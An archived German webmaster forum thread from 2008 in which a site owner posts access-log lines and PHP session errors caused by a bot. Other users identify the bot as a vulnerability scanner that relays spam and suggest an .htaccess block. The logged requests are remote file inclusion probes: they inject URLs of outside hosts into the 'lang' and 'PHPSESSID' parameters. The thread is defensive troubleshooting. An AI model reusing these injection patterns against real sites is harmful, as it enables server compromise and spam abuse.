ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

Spider/Robot verursacht PHP Warnungen/Fehler

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=36&t=53674

Seite 1 von 1

Spider/Robot verursacht PHP Warnungen/Fehler

Verfasst: 03.03.2008, 21:12
von Bubo
Moin moin,
seit drei Tagen quillt mein Errorlogfile mit PHP Fehlern und Warnungen über, weil irgendein Spider/Robot mit unterschiedlichen IP's ungültige Session-ID's erzeugt.

z.B.

Code: Alles auswählen

83.172.140.11 - - [03/Mar/2008:11:25:07 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:08 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:08 +0100] "GET /main.php?lang=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:09 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:09 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lang=de&PHPSESSID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lang=de&PHPSESSID=e533c2d96610674bf8a286c3bb36e4ed HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:10 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:11 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 
83.172.140.11 - - [03/Mar/2008:11:25:11 +0100] "GET /main.php?lan=&PHPSESSID=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F HTTP/1.0"
Die Fehlermeldungen sind dann - logischerweise - u.U.

Code: Alles auswählen

PHP Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent 
PHP Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0 
PHP Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0
Was soll das bezwecken? Per .htaccess sperren macht keinen Sinn, da es bisher immer verschiedene IP's waren.

Das nervt ziemlich und ich kann damit gar nichts anfangen. :bad-words:

Hat jemand ähnliche Erfahrungen?

Danke und Gruss
Sandra

Verfasst:
von
SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Verfasst: 03.03.2008, 22:59
von Outman
ja ja, das ist ein Bot der nach Script Schwachstellen sucht, wenn er fündig geworden ist, versucht der dann ein Newsletter Script aufzurufen und versendet dann Spam Mails über den Server.

mfg. Nico

Re: Spider/Robot verursacht PHP Warnungen/Fehler

Verfasst: 04.03.2008, 00:17
von smart
Bubo hat geschrieben:Moin moin,
Per .htaccess sperren macht keinen Sinn, da es bisher immer verschiedene IP's waren.
Das "http" in der URL könnte man sperren per .htaccess oder php.

Grüße

Verfasst: 04.03.2008, 10:15
von whyte
genau, bei dem PHPSESSID ...

Verfasst: 04.03.2008, 10:57
von Bubo
Danke für die Antworten.

Für die (für mich kryptischen) Rewrite Sachen bin ich leider nicht fit genug, um das in die .htaccess aufzunehmen.

Also werde ich wohl mit einem langen Errorfile leben müssen. :(

LG
Sandra

Verfasst: 04.03.2008, 11:21
von faris
Geht bei mir z.Zt. auch wieder rum...
https://go41.de/2008/02/06/php-echo-md5 ... -htaccess/

Verfasst: 04.03.2008, 13:22
von Bubo
@faris
Oh, Danke - das hat mich schon in die richtige Richtung geschubst :D

Verfasst: 04.03.2008, 19:02
von greh
Hallo Nico,
ja ja, das ist ein Bot der nach Script Schwachstellen sucht, wenn er fündig geworden ist, versucht der dann ein Newsletter Script aufzurufen und versendet dann Spam Mails über den Server.
Hast du dazu noch etwas genauere Informationen? Und bedeutet das, dass durch die Fehlerausgabe:

Code: Alles auswählen

/file/to/script.php Zeile 123
versucht wird, ein bestimmtes Script/Programm zu finden, oder zielt die Aktion auf ein allgemeine Sicherheitslücke?

Danke, greh[/code]

Verfasst: 04.03.2008, 19:50
von faris
faris hat geschrieben:Geht bei mir z.Zt. auch wieder rum...
https://go41.de/2008/02/06/php-echo-md5 ... -htaccess/
:o

Verfasst: 05.03.2008, 09:54
von Outman
greh hat geschrieben:Hallo Nico,
ja ja, das ist ein Bot der nach Script Schwachstellen sucht, wenn er fündig geworden ist, versucht der dann ein Newsletter Script aufzurufen und versendet dann Spam Mails über den Server.
Hast du dazu noch etwas genauere Informationen? Und bedeutet das, dass durch die Fehlerausgabe:

Code: Alles auswählen

/file/to/script.php Zeile 123
versucht wird, ein bestimmtes Script/Programm zu finden, oder zielt die Aktion auf ein allgemeine Sicherheitslücke?

Danke, greh[/code]
Morgen,


bei unsern Kunden hatte der Bot nur nach Sicherheitslücke gesucht und sobald er fündig geworden ist, hat er Spam Mails versendet.

mfg. Nico

Verfasst: 05.03.2008, 14:02
von Bubo
Outman hat geschrieben:....bei unsern Kunden hatte der Bot nur nach Sicherheitslücke gesucht und sobald er fündig geworden ist, hat er Spam Mails versendet.
@Nico

Sorry, falls die Frage blöd ist, aber wie sieht man das? Habt Ihr im Logfile anschliessend massenhaft POST Einträge gehabt?

LG
Sandra

P.S.: Seit der .htaccess Änderung gestern ist erstmal Ruhe :)

Verfasst: 05.03.2008, 14:35
von Outman
Bubo hat geschrieben:
Outman hat geschrieben:....bei unsern Kunden hatte der Bot nur nach Sicherheitslücke gesucht und sobald er fündig geworden ist, hat er Spam Mails versendet.
@Nico

Sorry, falls die Frage blöd ist, aber wie sieht man das? Habt Ihr im Logfile anschliessend massenhaft POST Einträge gehabt?

LG
Sandra

P.S.: Seit der .htaccess Änderung gestern ist erstmal Ruhe :)
Hallo,

das sieht man wenn man eine Zeit die Kundenaccounts beobachtet was für Prozesse angesteuert werden. Ich brauche dazu kein Logfile auswerten, da ich bei den Kundenaccount immer beobachten kann welches Script bzw. Webseite auf den Server gerade aufgerufen wurde.

mfg. Nico
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de